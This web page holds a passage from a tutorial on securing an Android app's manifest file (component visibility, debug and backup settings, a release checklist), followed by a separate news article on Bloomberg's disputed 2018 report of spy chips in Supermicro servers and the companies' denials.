You will notice that the shared UID follows a certain format akin to a package name. Any other naming convention will result in an installation error: INSTALL_PARSE_FAILED_BAD_SHARED_USER_ID. All applications that share the same UID should be signed with the same certificate.

External storage

Starting with API level 8, Android provides support for storing Android applications (APK files) on external devices, such as an SD card. This helps free up internal phone memory. Once the APK is moved to external storage, the only space taken up by the app on internal memory is the application's private data.
It is important to note that even for SD card resident APKs, the DEX (Dalvik Executable) files, private data directories, and native shared libraries remain on internal storage. This feature is enabled by adding an optional attribute in the manifest file. The application info screen for such an application has either a Move to SD card or a Move to phone button, depending on the current storage location of the APK. The user then has the option to move the APK file accordingly. If the external device is unmounted or the USB mode is set to Mass Storage (where the device is used as a disk drive), all the running activities and services hosted on that external device are immediately killed. Storing the APK on external devices is enabled by adding the optional attribute android:installLocation to the <manifest> element of the application's manifest file. The android:installLocation attribute can have the following three values:

internalOnly: The Android system will install the application on internal storage only. In case of insufficient internal memory, storage errors are returned.
preferExternal: The Android system will try to install the application on external storage. In case there is not enough external storage, the application will be installed on internal storage. The user will have the ability to move the app from external to internal storage and vice versa as desired.
auto: This option lets the Android system decide the best install location for the application. The default system policy is to install the application on internal storage first. If the system is running low on internal memory, the application is then installed on external storage. The user will have the ability to move the application from external to internal storage and vice versa as desired.

For example, even if android:installLocation is set to auto, on devices running a version of Android lower than 2.2 the system will ignore this feature and the APK will only be installed on internal memory. The following is a code snippet from an application's manifest file with this option:

<manifest package="com.example.android"
    android:versionCode="10"
    android:versionName="2.7.0"
    android:installLocation="auto" >

The following is a screenshot of the application with the manifest file as specified previously. You will notice that Move to SD card is enabled in this case:

In another application, where android:installLocation is not set, Move to SD card is disabled, as shown in the following screenshot:

Setting component visibility

Any of the application components, namely activities, services, providers, and receivers, can be made discoverable to external applications. This section discusses the nuances of such scenarios. Any Activity or Service can be made private by setting android:exported="false". This is also the default value for an Activity. See the following two examples of a private Activity:

<activity android:name=".Activity1" android:exported="false" />
<activity android:name=".Activity2" />

However, if you add an Intent Filter to the Activity, the Activity becomes discoverable for the Intent in the Intent Filter. Thus, an Intent Filter should never be relied upon as a security boundary.
See the following examples of Intent Filter declarations:

<activity android:name=".Activity1"
    android:label="@string/app_name" >
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
    </intent-filter>
</activity>

<activity android:name=".Activity2">
    <intent-filter>
        <action android:name="com.example.android.intent.START_ACTIVITY2" />
    </intent-filter>
</activity>

Both activities and services can also be secured by an access permission that the external component must hold. This is done using the android:permission attribute of the component tag. A Content Provider can be set up for private access by using android:exported="false". This is also the default value for a provider. In this case, only an application with the same user ID can access the provider. This access can be limited even further by setting the android:permission attribute of the provider tag. A Broadcast Receiver can be made private by using android:exported="false". This is the default value of the receiver if it does not contain any Intent Filters; in this case, only components with the same user ID can send a broadcast to the receiver. If the receiver contains Intent Filters, it becomes discoverable and the default value of android:exported is true.

Debugging

During the development of an application, we usually set the application to debug mode. This lets developers see verbose logs and get inside the application to check for errors. Debug mode is enabled in the <application> tag by setting android:debuggable to true. To avoid security leaks, it is very important to set this attribute to false before releasing the application. Examples of sensitive information that I have seen leak in my experience include usernames and passwords, memory dumps, internal server errors, and even some funny personal notes about the state of a server and a developer's opinion about a piece of code. The default value of android:debuggable is false.

Backup

Starting with API level 8, an application can choose a backup agent to back up the device to the cloud or a server. This is set up in the manifest file in the <application> tag by setting android:allowBackup to true and then setting android:backupAgent to a class name. The default value of android:allowBackup is true, and an application can set it to false if it wants to opt out of the backup. There is no default value for android:backupAgent, so a class name should be specified. The security implications of such a backup are debatable, as the services used to back up the data vary, and sensitive data such as usernames and passwords can be compromised.
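To make these two backup attributes concrete, here is a minimal sketch; the agent class name .MyBackupAgent is hypothetical and would have to be a subclass of android.app.backup.BackupAgent (or BackupAgentHelper) in the application's package:

<application
    android:label="@string/app_name"
    android:allowBackup="true"
    android:backupAgent=".MyBackupAgent">
    <!-- The application's components are declared here as usual -->
</application>

An application that wants to opt out of backups entirely would instead set android:allowBackup="false" and omit android:backupAgent.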
Putting it all together

The following example applies everything we have learned so far to analyze the AndroidManifest.xml file provided with the Android SDK sample RandomMusicPlayer. The manifest file specifies that this is version 1 of the application com.example.android.musicplayer. It runs against SDK 14 but supports versions back to SDK 7. The application uses two permissions, namely android.permission.INTERNET and android.permission.WAKE_LOCK. The application has one Activity called MainActivity, which is the entry point of the application, one Service called MusicService, and one receiver called MusicIntentReceiver. MusicService defines the custom actions PLAY, REWIND, PAUSE, SKIP, STOP, and TOGGLE_PLAYBACK. The receiver uses the action intents android.media.AUDIO_BECOMING_NOISY and android.media.MEDIA_BUTTON defined by the Android system. None of the components are protected with permissions. An example of such an AndroidManifest.xml file is shown in the following screenshot:
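The screenshot itself is not reproduced here, but based purely on the description above, the sample's manifest would look roughly like the following sketch. Only the package name, version, permissions, and component names come from the description; the custom action strings, resource names, and exact attribute values are assumptions:

<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.android.musicplayer"
    android:versionCode="1"
    android:versionName="1.0">

    <uses-sdk android:minSdkVersion="7" android:targetSdkVersion="14" />

    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />

    <application android:icon="@drawable/ic_launcher" android:label="@string/app_name">
        <!-- Entry point of the application -->
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <!-- Service exposing the custom playback actions -->
        <service android:name=".MusicService">
            <intent-filter>
                <action android:name="com.example.android.musicplayer.action.PLAY" />
                <action android:name="com.example.android.musicplayer.action.REWIND" />
                <action android:name="com.example.android.musicplayer.action.PAUSE" />
                <action android:name="com.example.android.musicplayer.action.SKIP" />
                <action android:name="com.example.android.musicplayer.action.STOP" />
                <action android:name="com.example.android.musicplayer.action.TOGGLE_PLAYBACK" />
            </intent-filter>
        </service>

        <!-- Receiver listening for system media events; note that
             android.intent.action.MEDIA_BUTTON is the framework's action
             string for media button events -->
        <receiver android:name=".MusicIntentReceiver">
            <intent-filter>
                <action android:name="android.media.AUDIO_BECOMING_NOISY" />
                <action android:name="android.intent.action.MEDIA_BUTTON" />
            </intent-filter>
        </receiver>
    </application>
</manifest>

Note how the Intent Filters on MusicService and MusicIntentReceiver make those components discoverable, which matches the observation that none of the components are protected with permissions.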
Example checklist

In this section, I have tried to put together an example checklist that I suggest you refer to whenever you are ready to release a version of your application. This is a very general version and you should adapt it to your own use case and components. When creating a checklist, think about issues that relate to the entire application, issues that are specific to a component, and issues that might come up from setting the component and application specifications together.

Application level

In this section, I have listed some questions that you should be asking yourself as you define the application-specific preferences. They may affect how your application is viewed, stored, and perceived by users. Some application-level questions that you may like to ask are as follows:

Do you want to share resources with other applications that you have developed? Did you specify the unique user ID? Did you define this unique ID for another application, either intentionally or unintentionally?
Does your application require some capabilities, such as camera, Bluetooth, or SMS?
Does your application need all the permissions it declares? Is there another permission that is more restrictive than the one you have defined? Remember the principle of least privilege.
Do all the components of your application need a given permission, or only a few?
Check the spellings of all the permissions once again. The application may compile and work even if a permission's spelling is incorrect.
If you have defined a permission, is it the correct one that you need?
At what API level does the application work? What is the minimum API level that your application can support?
Are there any external libraries that your application needs?
Did you remember to turn off the debug attribute before release?
If you are using a backup agent, remember to mention it here.
Did you remember to set a version number? This will help you during application upgrades.
Do you want to set up auto upgrades?
Did you remember to sign the application with your release key?
Sometimes setting a particular screen orientation will not allow your application to be visible on certain devices. For example, if your application only supports portrait mode, it might not appear on devices with landscape mode only.
Where do you want to install the APK?
Are there any services that might cease to work if an intent is not received in time?
Do you want some other application-level settings, such as the ability of the system to restore components?
If defining a new permission, think twice about whether you really need it. Chances are there is already an existing permission that covers your use case.

Component level

Some component-level questions that you should think about in the policy are listed here. These are questions you should be asking yourself for each component:

Did you define all the components?
If you are using third-party libraries in your application, did you define all the components that you will use?
Was there a particular setting that the third-party library expects from your application?
Do you want this component to be visible to other applications?
Do you need to add some Intent Filters?
If the component is not supposed to be visible, did you add Intent Filters anyway? Remember, as soon as you add Intent Filters, your component becomes visible.
Do other components require some special permission to trigger this component? Verify the spelling of the permission name.
Does your component require some capabilities, such as camera, Bluetooth, or SMS?

Summary

In this article, we learned how to define an application's policy file. The manifest file is the most important artifact of an application and should be defined with utmost care. It declares the permissions requested by an application and the permissions that external applications need to access its components. In the policy file, we also define the storage location of the APK and the minimum SDK version against which the application will run. The policy file should expose only those components that are not sensitive to the application. At the end of this article, we discussed some sample issues that a developer should be aware of when writing a manifest file.

Resources for Article:

Further resources on this subject:
So, what is Spring for Android? [Article]
Animating Properties and Tweening Pages in Android 3-0 [Article]
New Connectivity APIs – Android Beam [Article]

Savia Lobo
05 Oct 2018
4 min read
Save for later

Bloomberg's Big Hack Exposé says China had microchips on servers for covert surveillance of Big Tech and Big Brother; Big Tech deny supply chain compromise

According to an in-depth report published by Bloomberg yesterday, Chinese spies secretly inserted microchips into servers at Apple, Amazon, the US Department of Defense, the Central Intelligence Agency, and the Navy, among others.

What Bloomberg's Big Hack Exposé revealed

The tiny chips were made to be undetectable without specialist equipment and were implanted onto the motherboards of servers on the production line in China. These servers were allegedly assembled by Super Micro Computer Inc., a San Jose-based company that is one of the world's biggest suppliers of server motherboards. Supermicro's customers include Elemental Technologies, a streaming services startup that was acquired by Amazon in 2015 and provided the foundation for the expansion of the Amazon Prime Video platform. According to the report, the Chinese People's Liberation Army (PLA) placed the illicit chips on hardware during the manufacturing of server systems in factories.

How did Amazon detect these microchips?

In late 2015, Elemental's staff boxed up several servers and sent them to Ontario, Canada, for a third-party security company to test. The testers found a tiny microchip, not much bigger than a grain of rice, nested on the servers' motherboards; it wasn't part of the boards' original design. Following this, Amazon reported the discovery to U.S. authorities, which shocked the intelligence community. This is because Elemental's servers are ubiquitous, used across key US government agencies such as Department of Defense data centers, the CIA's drone operations, and the onboard networks of Navy warships. And Elemental was just one of hundreds of Supermicro customers. According to the Bloomberg report, "The chips were reportedly built to be as inconspicuous as possible and to mimic signal conditioning couplers." It was determined during an investigation, which took three years to conclude, that the chip "allowed the attackers to create a stealth doorway into any network that included the altered machines." The report claims Amazon became aware of the attack during moves to purchase the streaming video compression firm Elemental Technologies in 2015. Elemental's services appear to have been an ideal target for Chinese state-sponsored attackers to conduct covert surveillance. According to Bloomberg, Apple was also a victim of the apparent breach: Apple found the malicious chips in 2015 and subsequently cut ties with Supermicro in 2016.

Amazon, Apple, and Supermicro deny supply chain compromise

Amazon and Apple have both strongly denied the results of the investigation. Amazon said, "It's untrue that AWS knew about a supply chain compromise, an issue with malicious chips, or hardware modifications when acquiring Elemental. It's also untrue that AWS knew about servers containing malicious chips or modifications in data centers based in China, or that AWS worked with the FBI to investigate or provide data about malicious hardware." Apple affirms that internal investigations were conducted based on the Bloomberg queries and that no evidence was found to support the accusations. The only infected driver was discovered in 2016 on a single Supermicro server found in Apple Labs. It was this incident that may have led to the severed business relationship back in 2016, rather than the discovery of malicious chips or a widespread supply chain attack. Supermicro confirms that it was not aware of any investigation regarding the topic, nor was it contacted by any government agency in this regard.
Bloomberg says the denials are in direct contrast to the testimony of six current and former national security officials, as well as confirmation by 17 anonymous sources who said the description of the Supermicro compromise was accurate. Bloomberg's investigation has not been confirmed on the record by the FBI. To know more about this news in detail, visit Bloomberg News.

"Intel ME has a Manufacturing Mode vulnerability, and even giant manufacturers like Apple are not immune," say researchers
Amazon increases the minimum wage of all employees in the US and UK
Bloomberg says Google, Mastercard covertly track customers' offline retail habits via a secret million dollar ad deal